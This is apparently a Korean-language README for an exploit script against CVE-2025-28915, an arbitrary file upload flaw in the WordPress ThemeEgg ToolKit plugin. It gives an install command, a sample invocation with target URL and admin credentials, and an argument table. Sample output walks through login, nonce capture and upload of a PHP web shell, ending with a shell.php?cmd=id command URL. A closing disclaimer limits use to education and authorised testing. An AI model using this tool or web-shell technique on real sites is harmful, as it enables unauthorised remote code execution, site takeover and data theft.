
워드프레스 ThemeEgg ToolKit 플러그인 <= 1.2.9 - 임의 파일 업로드 취약점
WordPress용 ThemeEgg ToolKit 플러그인(버전 ≤ 1.2.9)에서 무제한 파일 업로드 취약점이 발견되어 인증된 공격자가 서버에 웹 셸을 업로드할 수 있습니다. 이로 인해 원격 코드 실행(RCE), 전체 웹사이트 장악, 민감한 데이터 유출이 발생할 수 있습니다.
이 스크립트는 CVE-2025-28915의 익스플로잇을 다음과 같이 자동화합니다:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| 인수 | 설명 |
|---|---|
-u | 대상 WordPress URL (예: http://target.com/wordpress) |
-un | WordPress 사용자 이름 |
-p | WordPress 비밀번호 |
[+] 취약한 버전 감지됨: 1.2.9
[+] 로그인 성공.
[+] 보안 논스 발견: f82467a997
[*] 웹 셸 업로드 중...
[+] 웹 셸 업로드 성공!
[+] 예상 웹 셸 위치: http://target.com/wp-content/uploads/2025/03/shell.php
[*] 테스트 명령: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
이 스크립트는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다. 무단 사용은 불법이며 비윤리적입니다. 저자는 오용에 대해 책임을 지지 않습니다.
제작: Khaled Alenazi (Nxploit)